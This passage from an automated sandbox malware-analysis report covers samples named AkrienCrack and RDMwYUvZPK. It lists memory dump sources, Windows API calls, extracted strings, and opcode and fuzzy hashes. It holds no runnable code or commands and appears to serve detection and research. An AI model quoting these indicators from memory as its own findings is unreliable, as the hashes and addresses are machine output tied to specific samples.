              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction ID: 970cdf4e9fdc65b76f9756a62f8fbc5b26d4ede41d3403a025e6ee26e8a24d1f
              • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction Fuzzy Hash: 8EA16672A003869FEB25CF68C8917BEBBE9EF55310F1841EDE8959B381C63C8942C754
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00B480B7,?,?,?), ref: 00B4A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00B480B7,?,?), ref: 00B4A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00B480B7,?,?,?,?,?,?,?,?), ref: 00B4A416
              • CloseHandle.KERNEL32(?,?,00000000,?,00B480B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00B4A41D
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: f16f90379cf39ee6ab6a0623f2be86d757a3604236debf661a05c408bfb45bea
              • Instruction ID: 9f0a962bfffef5555c7f5496519b4e2fefbe1169ba71c5ab9285e4ce6ee90f3f
              • Opcode Fuzzy Hash: f16f90379cf39ee6ab6a0623f2be86d757a3604236debf661a05c408bfb45bea
              • Instruction Fuzzy Hash: 4B41AD71288381AAE731EF24DC55BAEBBE8AB85700F04099DF5D493181D6A49B4CEB53
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B689AD,?,00000000,?,00000001,?,?,00000001,00B689AD,?), ref: 00B6C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B6C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B667E2,?), ref: 00B6C181
              • __freea.LIBCMT ref: 00B6C18A
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00B6251A
                • Part of subcall function 00B62B52: ___AdjustPointer.LIBCMT ref: 00B62B9C
              • _UnwindNestedFrames.LIBCMT ref: 00B62531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00B62543
              • CallCatchBlock.LIBVCRUNTIME ref: 00B62567
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              APIs
              • GetDC.USER32(00000000), ref: 00B59DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B59DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B59DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00B59DE9
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00B62016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00B6201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00B62020
                • Part of subcall function 00B6310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00B6311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00B62035
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              APIs
                • Part of subcall function 00B59DF1: GetDC.USER32(00000000), ref: 00B59DF5
                • Part of subcall function 00B59DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B59E00
                • Part of subcall function 00B59DF1: ReleaseDC.USER32(00000000,00000000), ref: 00B59E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00B59F8D
                • Part of subcall function 00B5A1E5: GetDC.USER32(00000000), ref: 00B5A1EE
                • Part of subcall function 00B5A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00B5A21D
                • Part of subcall function 00B5A1E5: ReleaseDC.USER32(00000000,?), ref: 00B5A2B5
              Strings
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              APIs
              Strings
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              APIs
              • __EH_prolog.LIBCMT ref: 00B47730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B478CC
                • Part of subcall function 00B4A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A458
                • Part of subcall function 00B4A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4A27A,?,?,?,00B4A113,?,00000001,00000000,?,?), ref: 00B4A489
              Strings
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              Strings
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              APIs
              Strings
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              APIs
                • Part of subcall function 00B4EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B4EB92
                • Part of subcall function 00B4EB73: GetProcAddress.KERNEL32(00B881C0,CryptUnprotectMemory), ref: 00B4EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,00B4EBEC), ref: 00B4EC84
              Strings
              • CryptUnprotectMemory failed, xrefs: 00B4EC7C
              • CryptProtectMemory failed, xrefs: 00B4EC3B
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              APIs
              • CreateThread.KERNEL32(00000000,00010000,00B509D0,?,00000000,00000000), ref: 00B508AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 00B508F4
                • Part of subcall function 00B46E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B46EAF
              Strings
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              APIs
                • Part of subcall function 00B4DA98: _swprintf.LIBCMT ref: 00B4DABE
                • Part of subcall function 00B4DA98: _strlen.LIBCMT ref: 00B4DADF
                • Part of subcall function 00B4DA98: SetDlgItemTextW.USER32(?,00B7E154,?), ref: 00B4DB3F
                • Part of subcall function 00B4DA98: GetWindowRect.USER32(?,?), ref: 00B4DB79
                • Part of subcall function 00B4DA98: GetClientRect.USER32(?,?), ref: 00B4DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
              • SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              Strings
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00B50A78,?), ref: 00B50854
              • GetLastError.KERNEL32(?), ref: 00B50860
                • Part of subcall function 00B46E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B46EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B50869
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00B4D32F,?), ref: 00B4DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B4D32F,?), ref: 00B4DA61
              Strings
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdcd618f55d12445fc00c11b881dc0e477f6e39ce55b7022ae0b95ba7c2ad141
              • Instruction ID: 3fef15386cf9d734c1d999b742edfe6a59e14bf1c9bb6284bb96e826a297b9c5
              • Opcode Fuzzy Hash: bdcd618f55d12445fc00c11b881dc0e477f6e39ce55b7022ae0b95ba7c2ad141
              • Instruction Fuzzy Hash: CCA1A271B1D94E4FEB98EB68C4657A97BE1EF59310F4001BAD00EC72DACBB92845C740
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: c49d4afa5bdb51f05e7650c40ac406fb1a66320b218b34382f75a63e572c6978
              • Instruction ID: 3ec24cac319f9bf7b08293b7e17654d05ee830109f6fb79c84b6c060e78ea9d4
              • Opcode Fuzzy Hash: c49d4afa5bdb51f05e7650c40ac406fb1a66320b218b34382f75a63e572c6978
              • Instruction Fuzzy Hash: 12D0E9B0E1855D8EDB75EF18C8547ACB6F1BB14344F0101F5951DE2251DBB45AD08F04
              Memory Dump Source
              • Source File: 00000009.00000002.1932508891.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_7ffd9b9f0000_refdhcp.jbxd
              Memory Dump Source
              • Source File: 00000026.00000002.2057775421.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_7ffd9ba00000_RDMwYUvZPK.jbxd
              Memory Dump Source
              • Source File: 00000026.00000002.2057775421.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_7ffd9ba00000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b017555bb0ba601f4c9a95ebbb5e4079681f51ced9a50b0e490d2e9de48ac14
              • Instruction ID: 5d8bd43f405f72cf42bc6b082bc89ae2a90fcc692fe61807a6eaed4fed01bca3
              • Opcode Fuzzy Hash: 1b017555bb0ba601f4c9a95ebbb5e4079681f51ced9a50b0e490d2e9de48ac14
              • Instruction Fuzzy Hash: 72F0963090E38D8FE7599F7488781A93B70FF46204F4504BFE459C61E2DB799654C701
              Memory Dump Source
              • Source File: 00000026.00000002.2057775421.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_7ffd9ba00000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e390ac137f12aee6eba3fed536c862694036d37a72c7d8c9046bd62bbcade079
              • Instruction ID: f7e7864022fef9b78b6b5e3cfb32460a79268a493f8d89427e4611321ee1d5cf
              • Opcode Fuzzy Hash: e390ac137f12aee6eba3fed536c862694036d37a72c7d8c9046bd62bbcade079
              • Instruction Fuzzy Hash: 12F09030A0E78E8FEB699FA488251A93BA0BF56304F4504BAE849C60E6DB799558C741
              Memory Dump Source
              • Source File: 00000026.00000002.2057775421.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_38_2_7ffd9ba00000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3aa362d3022c8d6dc0a069eab331081e66b94813eca5461a0a7a09a208f44e10
              • Instruction ID: c961f24bbbf3b1a33fe488782ff6f56f8edaf4dea75572eaaa1bc00118590e50
              • Opcode Fuzzy Hash: 3aa362d3022c8d6dc0a069eab331081e66b94813eca5461a0a7a09a208f44e10
              • Instruction Fuzzy Hash: DDF07430A09A5E8EDB64DB48CC55AAAB7B1FB4A341F5001EAC44DE3291DA705A808F05
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c3fbdbd2a10499c5b1b2db86c11f801d48135badae7aa0d7f5f50a745f65ba71
              • Instruction ID: 4f0978b24a0c20921f157d12c490815e76a2fe2827346d1158d9a3377c4cc752
              • Opcode Fuzzy Hash: c3fbdbd2a10499c5b1b2db86c11f801d48135badae7aa0d7f5f50a745f65ba71
              • Instruction Fuzzy Hash: 69120B70E1961D8FEBA4EB68C8A5BEDB7B1FF58300F1101B9D40DA3295CA756E84CB41
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 89a83be227fe10f0ea5ae57e82c0adf387a849e2edffbf42b143e3cbe613c8c6
              • Instruction ID: 4711f411e9f4c2151a11e3fe7694a5725298d1247ee45bcd3376fff130bed052
              • Opcode Fuzzy Hash: 89a83be227fe10f0ea5ae57e82c0adf387a849e2edffbf42b143e3cbe613c8c6
              • Instruction Fuzzy Hash: DBF1A630A09A4E8FEBA8DF28C855BE937D1FF55310F14426EE84DC7295CF74A9458B82
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e4b2cb79af3962ee3b31c054f3c719e70d443516af34b14e13e434b4396f1b0
              • Instruction ID: 53662d8ec0be0b71e731309a132bbf2dc9bd9697fa4dcedbea6090800e5c2bcc
              • Opcode Fuzzy Hash: 4e4b2cb79af3962ee3b31c054f3c719e70d443516af34b14e13e434b4396f1b0
              • Instruction Fuzzy Hash: 4AE1C630A09A4E4FEBA8DF28C8657E977E1FF54310F14426ED84DC72A5CF78A9448B81
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9f0000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11cbdbd58b352e5b0284a0f5d0ffdcfd471eee8d728c0abe5ecbee9b01a92363
              • Instruction ID: db35e1fbef7f006e6f9e85863706652431678b94d3c106943b430c4964849d59
              • Opcode Fuzzy Hash: 11cbdbd58b352e5b0284a0f5d0ffdcfd471eee8d728c0abe5ecbee9b01a92363
              • Instruction Fuzzy Hash: A9A1A071B2D94E4FEB98EBA8C8657E97FE1EF59310F4101BAD00DC72DACB6528058B40
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^)$M_^+$M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-2317162648
              • Opcode ID: b499d12478560f33126e965090134612120aed3165e985c80c0baa78ad5c6959
              • Instruction ID: e0e4a2bf27ce1793837ffd0b0def66f994d9dfe264f85d443dda3c31c0e8a632
              • Opcode Fuzzy Hash: b499d12478560f33126e965090134612120aed3165e985c80c0baa78ad5c6959
              • Instruction Fuzzy Hash: 8D314A7270A1498FD706BF68A8615F877E0EF55324B4502FFC49ACB1D3ED2564468784
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^)$M_^+$M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-2317162648
              • Opcode ID: f3479bd7cff84ba91b0cdf202ea13665a2534e4af8617dd6340bb4fb102ea2ed
              • Instruction ID: eeb63ca429ea37c4847577f5ec0deadac89f887d0688de366a5a8c11543f7f18
              • Opcode Fuzzy Hash: f3479bd7cff84ba91b0cdf202ea13665a2534e4af8617dd6340bb4fb102ea2ed
              • Instruction Fuzzy Hash: A4217D7270E2898BE7067F6898715E977E0EF52324B4502FBC4AACB1C3FD25644B8684
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-1741231188
              • Opcode ID: 98d02997b853fc0750a8b6b31d0f2b6d81b1a2285c01cdb55d6815f88332fd00
              • Instruction ID: 5a0a8348e07b3e4ad5133497844816c2e1f5fac53bf3abc53e1110153374de51
              • Opcode Fuzzy Hash: 98d02997b853fc0750a8b6b31d0f2b6d81b1a2285c01cdb55d6815f88332fd00
              • Instruction Fuzzy Hash: 3721477270E18D4BE7067F68A8715E87BE0EF52324B0502FBC59ACA0D3ED65654A8784
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: M_^9$M_^;$M_^=$M_^?
              • API String ID: 0-1741231188
              • Opcode ID: ad3814f55af60e98774fba7e155ea03ed036e001bdf6a5a2f2d30cd87b9ad5cb
              • Instruction ID: a8416797fe997c0e357e2800efc845072c9df3fb715f00f7c11344f3f17c2ebb
              • Opcode Fuzzy Hash: ad3814f55af60e98774fba7e155ea03ed036e001bdf6a5a2f2d30cd87b9ad5cb
              • Instruction Fuzzy Hash: 50116A7160F28D4FE7066B689C711F87BE0EF13224F0502FBD4A9CB1D3ED6525568684
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9FF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9ff000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: L$[$k$}
              • API String ID: 0-2042071302
              • Opcode ID: bf325f814c3c1608c6b2be31bbd0c523ba9f2e7574e42b705e17d964cc53df5b
              • Instruction ID: 9880474cf5075be039f08a7b36b02360053ca9c1b1eb85007a477cef165848a2
              • Opcode Fuzzy Hash: bf325f814c3c1608c6b2be31bbd0c523ba9f2e7574e42b705e17d964cc53df5b
              • Instruction Fuzzy Hash: 1B21D470A1962E8FDB78DF44C8A07FA7BB1AB14311F1141FAD41D92291DB386E85DF40
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: a$k$w
              • API String ID: 0-908832881
              • Opcode ID: 941dfaf01a86381ff4077a1f7a681b9c7cead12c194f83f3e12ba93316ba2ef3
              • Instruction ID: 355b32af59a042cfe09b78ac9a08adf6616377b82416e338329be7af80e4bce6
              • Opcode Fuzzy Hash: 941dfaf01a86381ff4077a1f7a681b9c7cead12c194f83f3e12ba93316ba2ef3
              • Instruction Fuzzy Hash: 2311C530A4951E8FEFA4DF04C894FA9B7B2FB65301F0542E9D40DE7290CAB5AA908F40
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9FA000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9fa000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: _
              • API String ID: 0-701932520
              • Opcode ID: b733f446dbaefdb31b29e610fc3addb83ec0334f45ca5352c36b3bb0921d1b33
              • Instruction ID: 44e170112d087f6726988bb4a381d78fa08d1dfbcc3c470b770d50193612e4ef
              • Opcode Fuzzy Hash: b733f446dbaefdb31b29e610fc3addb83ec0334f45ca5352c36b3bb0921d1b33
              • Instruction Fuzzy Hash: 3FE13D71E2965D8FEBA8EF98C4A47E8BBA1FF58311F4501BDD00DD32A6CA346944CB41
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA02000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba02000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: N_^
              • API String ID: 0-2232263386
              • Opcode ID: ae3734d6603f05e95918516cf884c0fb92839e2cec9529c674892319cfcb9ef8
              • Instruction ID: b2dcd47881f8d133113e7542115307e38809bb536886b74612b8b7a4b41d98ce
              • Opcode Fuzzy Hash: ae3734d6603f05e95918516cf884c0fb92839e2cec9529c674892319cfcb9ef8
              • Instruction Fuzzy Hash: 2B512827B0D56A5BE721B7EDB8B45EABFD0EF56372B0900B7D289CA093D950A4448390
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: H
              • API String ID: 0-2852464175
              • Opcode ID: 76655af93cbfd80316e68127d9d48e60ce1f8365b0fb512f20160c4dc497433c
              • Instruction ID: 47b0481b254a3db7648c4b0e13de1e7b2322a8f1af4dcc007034956ad763b210
              • Opcode Fuzzy Hash: 76655af93cbfd80316e68127d9d48e60ce1f8365b0fb512f20160c4dc497433c
              • Instruction Fuzzy Hash: F2112420B1DC4F4FEBE8EB6880A0A65B3D1FFA4300B5185BAC41DC7199ED2CED828340
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9FF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9ff000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 38dc9c5c5cf0cded5fd0b55d19a8e6cbf471a0cd852d4cccaf5a6e4a77968cb2
              • Instruction ID: b9e320f8f371da527c4bf9cce93b411eb3e83f9c6442976f9481d7300dc7eaf1
              • Opcode Fuzzy Hash: 38dc9c5c5cf0cded5fd0b55d19a8e6cbf471a0cd852d4cccaf5a6e4a77968cb2
              • Instruction Fuzzy Hash: F5E09B30A0871D8FEB24DF40C8B0DED73B1EB51301F110129D409DB2D5DAB45544DB45
              Strings
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9B9FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9FF000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9b9ff000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID: D
              • API String ID: 0-2746444292
              • Opcode ID: 43c38f8ec4a4df4a5d0c22c4f00b230e862dd1c319d74c4f7e33af068b488e60
              • Instruction ID: f4a45a279b6335fcdb95a44721c879cd842582fe6f3d8170c6625c5c02922171
              • Opcode Fuzzy Hash: 43c38f8ec4a4df4a5d0c22c4f00b230e862dd1c319d74c4f7e33af068b488e60
              • Instruction Fuzzy Hash: F5D0C930B1992C8BDB65DA08CC607A977B5AF04311F0100E0D10CA31A1CB346F818F41
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 470db6085768fb166daf9b5ca0fb32eb4c808faa596183446a4beaeb6c46503f
              • Instruction ID: 214c8f0894ca0d51ee9e7446eb597f7a51794fc77f0587c75f634f5df697c91b
              • Opcode Fuzzy Hash: 470db6085768fb166daf9b5ca0fb32eb4c808faa596183446a4beaeb6c46503f
              • Instruction Fuzzy Hash: AF423570E0592D8FDBA8EF18C894BA9B7B1FB69306F5001EA914DE3291DB755EC08F05
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dc9f3a274523dad100c367177481f77461713cb99937c5fb770d47071fa814de
              • Instruction ID: d8c2509eca3b1f1ce25d917198f9cdf40d9d752259f5c98f6a51e2194efb71c0
              • Opcode Fuzzy Hash: dc9f3a274523dad100c367177481f77461713cb99937c5fb770d47071fa814de
              • Instruction Fuzzy Hash: 99023E30A4951D8FEBA4EB58C865BE9B7B1FF58300F0101BAD41DE32A5CE75AE858B41
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee2610bff734c2ec0ddfcd87481d59dd5449e3427147416b36c444779465c719
              • Instruction ID: 39fda27ff7c19dd810ffa8f771a1577444fce0b39a249dc12101a7e223bd5d7c
              • Opcode Fuzzy Hash: ee2610bff734c2ec0ddfcd87481d59dd5449e3427147416b36c444779465c719
              • Instruction Fuzzy Hash: AAF16E71E1991D8EEBA4EF68C865BE8B7B1FF58300F1101B9D05DD72A6DE346A81CB40
              Memory Dump Source
              • Source File: 00000028.00000002.4200895919.00007FFD9BA07000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA07000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_40_2_7ffd9ba07000_RDMwYUvZPK.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 444138fc71a55d918b4c78ecbd9fb040c98712b56a03cd3fc943f43bd310650f
              • Instruction ID: ea7b86abdf62eed6b1ef98164352fee942ec6901f7f77548f457ea295d9dbfeb
              • Opcode Fuzzy Hash: 444138fc71a55d918b4c78ecbd9fb040c98712b56a03cd3fc943f43bd310650f
              • Instruction Fuzzy Hash: EFD19830E1552D8EEBA4EB58C8A9BE9B7B1FF59300F5101F9944DD32A2CE756E818F00
              Memory Dump Source
